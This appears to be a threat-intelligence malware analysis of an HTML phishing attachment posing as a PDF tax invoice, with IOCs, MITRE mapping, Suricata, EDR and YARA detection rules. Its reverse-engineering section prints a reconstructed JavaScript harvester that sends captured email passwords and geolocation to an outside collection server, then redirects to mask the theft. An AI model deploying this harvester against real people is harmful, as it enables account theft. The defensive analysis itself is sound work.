Anatomy of a Low-Detection Credential Phishing Campaign

description: "Deep-dive reverse engineering analysis of a sophisticated HTML-based credential harvester spoofing a corporate domain with only 1/26 AV detection."

⚠️ Threat Level: HIGH | Detection Rate: 3% (1/26) | Type: Credential Harvester + Geo-IP Exfiltration

Executive Summary

On April 29, 2026, a targeted phishing email was received purportedly from accnt@hackteam.red — a lookalike domain spoofing a legitimate corporate identity. The attachment, named Tax Invoice PDF.SHTML, is a highly obfuscated HTML file masquerading as a PDF document. When opened in a browser, it harvests email credentials and geolocation data, exfiltrating them to a command-and-control (C2) server with minimal antivirus detection.

This article provides a full technical teardown of the sample, its behavioral indicators, network infrastructure, and defensive recommendations.

1. Attack Chain Overview

[Email Delivery] → [Social Engineering] → [HTML Execution] → [Credential Harvesting] → [Geo-IP Collection] → [C2 Exfiltration] → [Delayed Redirect]

Stage	Description
Delivery	Spearphishing email with `.SHTML` attachment
Pretext	"Tax invoice due for payment" — urgency-based social engineering
Execution	User opens file → browser renders fake login page
Harvesting	Form captures email + password
Reconnaissance	`ip-api.com` lookup for geolocation enrichment
Exfiltration	POST to `premiumpriests4owo.site/report.php`
Evasion	Redirect to Google static image to mask compromise

2. Sample Metadata

Filename:        Tax Invoice PDF.SHTML
Size:            18 KiB
MIME Type:       text/html
SHA256:          15383c1b855341a0bc4975f2f3ed299bc6abf13a3e6e48b05ca3371dd7068dfc
AV Detection:    1/26 (3%) — Avira: PHISH/HTML.Agent.ENJ
Entropy:         5.42 (high — indicates script obfuscation)
First Seen:      2026-05-01 07:57:37 UTC

Why the Low Detection Rate?

Traditional AV engines excel at signature-based detection of binary malware (PE files, DLLs). This sample is pure HTML + JavaScript — a "fileless" threat that executes entirely within the browser sandbox. Without a malicious binary payload, most static scanners return clean results. The high entropy (5.42) confirms obfuscated JavaScript, but entropy alone is rarely sufficient for detection without behavioral analysis.

3. Email Analysis

Headers & Social Engineering

From:    Account <accnt@hackteam.red>
To:      b0x@hackteam.red
Date:    29 Apr 2026, 21:29 UTC
Subject: [Implied] Tax Invoice

Key Psychological Triggers:

Domain spoofing: hackteam.red mimics a legitimate corporate domain
Authority impersonation: Sender name "Account" implies financial department
Urgency: "due for payment at the end of this month"
Curiosity gap: "Use your email password to access the Tax document" — this is the critical red flag; no legitimate PDF requires an email password

4. Behavioral Analysis (Sandbox Telemetry)

Analysis performed via Hybrid Analysis Falcon Sandbox. The sample triggered 29 indicators mapped to 21 MITRE ATT&CK techniques across 8 tactics.

4.1 Process Execution

# Primary execution
msedge.exe -- "file:///C:/TaxInvoicePDF.SHTML.html"

# Child processes spawned (standard Edge browser behavior)
msedge.exe --type=renderer
msedge.exe --type=gpu-process
msedge.exe --type=utility --utility-sub-type=network.mojom.NetworkService
identity_helper.exe --type=utility

Note: The file opens directly in the browser via file:// protocol — no external server required for initial execution. This makes it highly portable and dangerous even in air-gapped preview scenarios.

4.2 Network Indicators

Domain / IP	Purpose	Risk
`ip-api.com`	Geo-IP lookup (country, region, city, ISP, IP)	Reconnaissance
`premiumpriests4owo.site`	C2 server — credential exfiltration	MALICIOUS
`i.imgur.com/6lOn9d7.png`	Likely decoy image / branding asset	Legitimate abused
`encrypted-tbn0.gstatic.com`	Post-exfiltration redirect destination	Legitimate abused

4.3 MITRE ATT&CK Mapping

Technique	ID	Context
Spearphishing Attachment	T1566.001	Email with `.SHTML` attachment
Drive-by Compromise	T1189	Browser execution of malicious HTML
System Location Discovery	T1016	`ip-api.com` JSON query
Exfiltration Over C2	T1041	POST to `report.php`
Obfuscated Files	T1027.006	High entropy JS (5.42)
Input Capture	T1056.004	Password field harvesting
Application Layer Protocol	T1071.001	HTTP/HTTPS C2 communication
Data Encoding	T1132.001	Base64 artifacts in requests

5. Reverse Engineering: Script Deconstruction

Based on sandbox memory extraction and pattern matching, the embedded JavaScript follows this logical flow:

// ============================================
// Phase 1: Geolocation Reconnaissance
// ============================================
fetch('http://ip-api.com/json/?fields=status,message,country,regionName,city,isp,query')
  .then(response => response.json())
  .then(geoData => {
    if (geoData.status === 'success') {
      locationData = {
        country: geoData.country || 'Unknown',
        state: geoData.regionName || 'Unknown',
        city: geoData.city || 'Unknown',
        isp: geoData.isp || 'Unknown',
        ip: geoData.query || 'Unknown'
      };
    }
  });

// ============================================
// Phase 2: Credential Harvesting Form
// ============================================
/*
  Rendered HTML structure (inferred):
  <form method="post" id="authForm">
    <input type="email" placeholder="email" name="oruko">
    <input type="password" placeholder="Enter password" name="...">
    <button type="submit">Access Document</button>
  </form>
  <div id="errorMsg">Invalid credentials</div>
*/

document.getElementById('authForm').addEventListener('submit', function(e) {
  e.preventDefault(); // Prevent actual form submission

  const formEmail = document.querySelector('[name="oruko"]').value;
  const formPassword = document.querySelector('[type="password"]').value;

  // ============================================
  // Phase 3: Data Exfiltration
  // ============================================
  const xhr = new XMLHttpRequest();
  const PHP_ENDPOINT = 'https://premiumpriests4owo.site/report.php';

  xhr.open('POST', PHP_ENDPOINT, true);
  xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');

  const params = new URLSearchParams();
  params.append('oruko', formEmail);      // "oruko" = Yoruba for "name"
  params.append('...', formPassword);    // [obfuscated key]
  params.append('geo', JSON.stringify(locationData));

  xhr.send(params.toString());

  // ============================================
  // Phase 4: Evasion — Delayed Redirect
  // ============================================
  setTimeout(() => {
    window.location.href = 'https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQaUwWuDNV0h2gvKH5z1fKZ2B05YVGNhfKgCg&s';
  }, 2000); // 2-second delay to mask data transmission
});

Notable Obfuscation Techniques

High Entropy Strings: Character sequences like y."sZ"( and J+zX suggest Base64 or custom encoding layers
Legitimate Service Abuse: Using ip-api.com (free geo-IP API) and i.imgur.com (image hosting) blends malicious traffic with benign patterns
Variable Naming: The use of oruko (Yoruba language) may indicate operator origin or intentional anti-analysis confusion
Delayed Redirect: The setTimeout redirect to a Google static image creates a plausible "loading" experience while data transmits in background

6. Infrastructure Analysis

C2 Domain: `premiumpriests4owo.site`

TLD: .site — commonly abused for cheap, disposable infrastructure
Naming convention: Nonsensical dictionary words + random suffix (4owo) — algorithmically generated domain (DGA-like pattern)
Endpoint: /report.php — standard PHP data collection script
Protocol: HTTPS (TLS 1.2) — encrypts exfiltration in transit

Abuse of Legitimate Services

Service	Abuse Vector	Detection Evasion
`ip-api.com`	Free geolocation API	No malicious infrastructure needed
`i.imgur.com`	Image hosting for decoy assets	Trusted domain in corporate allowlists
`googleapis.com`	Chrome Web Store verification (legitimate Edge behavior)	Blends with normal browser traffic

7. Detection & Defensive Strategies

7.1 Network-Level Detection

# Suricata / Snort Signatures
alert http any any -> any any (
    msg:"PHISHING HTML Credential Exfiltration - ip-api.com + form POST";
    content:"ip-api.com"; http_uri;
    content:"password"; http_client_body;
    content:"email"; http_client_body;
    classtype:trojan-activity;
    sid:1000001; rev:1;
)

alert http any any -> any any (
    msg:"SUSPICIOUS POST to .site domain with credential data";
    content:"POST"; http_method;
    content:".site/"; http_uri;
    pcre:"/(password|passwd|pwd|email|oruko)/i";
    classtype:trojan-activity;
    sid:1000002; rev:1;
)

7.2 Email Security Policies

Policy	Implementation
Attachment Blocking	Quarantine `.shtml`, `.html`, `.htm` attachments from external senders
Double Extension Detection	Flag `.PDF.` patterns — PDFs don't need secondary extensions
DMARC Enforcement	`p=reject` for `hackteam.red` to prevent spoofing
User Training	"No PDF requires your email password" — golden rule

7.3 Endpoint Detection (EDR/XDR)

# Behavioral Indicator
Process: msedge.exe | chrome.exe | firefox.exe
CommandLine contains: "file:///" AND "*.html" AND ("ip-api.com" OR "ipapi.co")
Action: Alert + Isolate

# File System Indicator
FileWrite: *.SHTML, *.HTML with entropy > 5.0 AND contains "password" OR "type="password""
Action: Quarantine + Hash submission

7.4 YARA Rule

rule HTML_Credential_Harvester_Generic {
    meta:
        description = "Detects HTML-based credential phishing with geo-IP and exfiltration"
        author = "ThreatIntel Analyst"
        date = "2026-05-01"
        hash = "15383c1b855341a0bc4975f2f3ed299bc6abf13a3e6e48b05ca3371dd7068dfc"
    strings:
        $geo1 = "ip-api.com" ascii wide
        $geo2 = "ipapi.co" ascii wide
        $form1 = "type="password"" ascii wide
        $form2 = "placeholder="Enter password"" ascii wide
        $exfil1 = "XMLHttpRequest" ascii wide
        $exfil2 = "URLSearchParams" ascii wide
        $exfil3 = "application/x-www-form-urlencoded" ascii wide
        $redirect1 = "setTimeout" ascii wide
        $redirect2 = "window.location.href" ascii wide
    condition:
        filesize < 50KB and
        (uint16(0) == 0x3c21 or uint16(0) == 0x3c68) and // HTML signature <! or <h
        1 of ($geo*) and
        1 of ($form*) and
        1 of ($exfil*) and
        1 of ($redirect*)
}

8. IOC Summary

Type	Indicator	Confidence
File Hash	`15383c1b855341a0bc4975f2f3ed299bc6abf13a3e6e48b05ca3371dd7068dfc`	Confirmed
C2 Domain	`premiumpriests4owo.site`	Malicious
C2 URL	`https://premiumpriests4owo.site/report.php`	Malicious
Geo-IP API	`http://ip-api.com/json/`	Abused
Decoy Image	`https://i.imgur.com/6lOn9d7.png`	Abused
Redirect Target	`https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQaUwWuDNV0h2gvKH5z1fKZ2B05YVGNhfKgCg&s`	Abused
Sender	`accnt@hackteam.red`	Spoofed

9. Lessons Learned

Fileless threats bypass traditional AV: HTML/JS phishing requires behavioral analysis, not just signatures
Legitimate services are weaponized: ip-api.com, imgur.com, googleapis.com provide cover for malicious activity
Double extensions still work: PDF.SHTML exploits user trust in PDFs while executing HTML
Low detection ≠ low risk: 1/26 AV detection is a feature, not a bug — the threat is real and active
User awareness is the last line of defense: Technical controls failed; the user who questions "Why does a PDF need my password?" stops the chain

10. References

Analysis conducted May 1, 2026. Indicators are shared for defensive purposes. If you encounter similar samples, submit to your threat intelligence platform and update detection rules.

Stay vigilant. Trust but verify.